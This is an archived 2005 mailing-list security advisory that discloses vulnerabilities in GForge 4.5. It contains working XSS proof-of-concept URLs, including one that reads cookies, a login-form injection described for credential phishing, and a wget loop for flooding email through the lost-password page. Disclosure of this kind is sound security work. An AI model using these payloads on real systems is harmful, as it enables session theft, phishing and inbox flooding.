Cross Site Scripting vulnerabilities in GForge

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 07/27/05

  • Next message: sylvain.roger_at_solucom.fr: "Re: Re : [Firefox Bug 302187] New: Shared section vulnerability when opening microsoft office document resulting in DoS"
    To: bugtraq@securityfocus.com, Full Disclosure <full-disclosure@lists.netsys.com>, Secunia <vuln@secunia.com>, Security Tracker <bugs@securitytracker.com>, core@gforge.org, tim@perdue.net
    Date: Wed, 27 Jul 2005 22:37:16 +0200
    
    
    

    ---------------------------------------------------------------------------
              Various Vulnerabilities in GForge
    ---------------------------------------------------------------------------

    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2005
    Location: Basque Country

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    GForge - 4.5 (Current)

    GForge has tools to help your team collaborate, like message forums and
    mailing lists; tools to create and control access to Source Code
    Management
    repositories like CVS and Subversion. GForge automatically creates a
    repository
    and controls access to it depending on the role settings of the project.

    Web : http://gforge.org/

    ---------------------------------------------------------------------------

    A) Cross Site Scripting Vulnerabilities
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1.- In the Forum Module:

            http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script>
            http://[target]/forum/forum.php?group_id="><script>alert('hi')</script>

    (NOTE: The group_id parameter is ALWAYS vulnerable.)

    2.- In the Task Module:

    http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3

    3.- In the Snippets Module:

            http://[target]/snippet/detail.php?type=snippet&id=21"><iframe%
    20src=http://www.playboy.com></iframe><font%20size="

    4.- In the search engine:

    To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in
    the
    search field and press enter or try the following URL:

            http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%
    3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
    3E&Search=Search

    5.- In other modules:

    http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script>
            http://[target]/notepad.php?form=parent;%0d%0a-->%0d%
    0a</script><body><h1>hi!</h1></body></html><!--

    NOTE: (rows, cols and wrap paremeter are also vulnerables).

    6.- In the Login Form:

    The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
    This may
    be used to launch phising attacks by sending HTML e-mails (i.e.: saying
    that you need
    to upgrade to the latest GForge version due to a security problem) and
    putting in the
    e-mail an HTML link that points to an specially crafted url that inserts
    an html form
    in the GForge login page and when the user press the login button,
    he/she send the
    credentials to the attackers website.

    POC. To "play" with this, simply go to the login page and insert in the
    login field
    then following text:

            "><iframe src=http://www.playboy.com></iframe><font size="

    B) E-Mail Flood
    ~~~~~~~~~~~~~~~

    The 'forgot your password?' feature allows a remote user to load a
    certain URL to
    cause the service to send a validation e-mail to the specified user's
    e-mail address.
    There is no limit to the number of messages sent over a period of time,
    so a remote
    user can flood the target user's secondary e-mail address. E-Mail Flood,
    E-Mail bomber.

    The following is a "Proof Of Concept" of this vulnerability:

            [joxean@nemobox]$ while [ true ]; do
    > wget http://[target]/account/lostpw.php?loginname=joxean
    > done

    The "pending account" confirmation e-mail is also vulnerable so, a
    mailicious user can
    flood any e-mail box even if they are not GForge registered users.

    The fix:
    ~~~~~~~~

    There is no fix at the moment.

    Workarounds:
    ~~~~~~~~~~~~

    There are no workarounds except by using a method to automagically catch
    the XSS
    request such as WASP (available via CVS at
    https://savannah.nongnu.org/wasp) or
    mod_security (available at http://www.modsecurity.org/) for Apache Web
    Servers.

    Timeline:
    ~~~~~~~~~

    25-Apr-2005 Vendor contacted
    25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
    25-Apr-2005 Response to vendor
    04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
    23-Jun-2005 Vendor RE-contacted (No response)
    27-Jul-2005 Advisory released

    Disclaimer:
    ~~~~~~~~~~~

    The information in this advisory and any of its demonstrations is
    provided
    "as is" without any warranty of any kind.

    I am not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    ---------------------------------------------------------------------------

    Contact:
    ~~~~~~~~

            Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

    
    

                    
    ______________________________________________
    Renovamos el Correo Yahoo!
    Nuevos servicios, más seguridad
    http://correo.yahoo.es



  • Next message: sylvain.roger_at_solucom.fr: "Re: Re : [Firefox Bug 302187] New: Shared section vulnerability when opening microsoft office document resulting in DoS"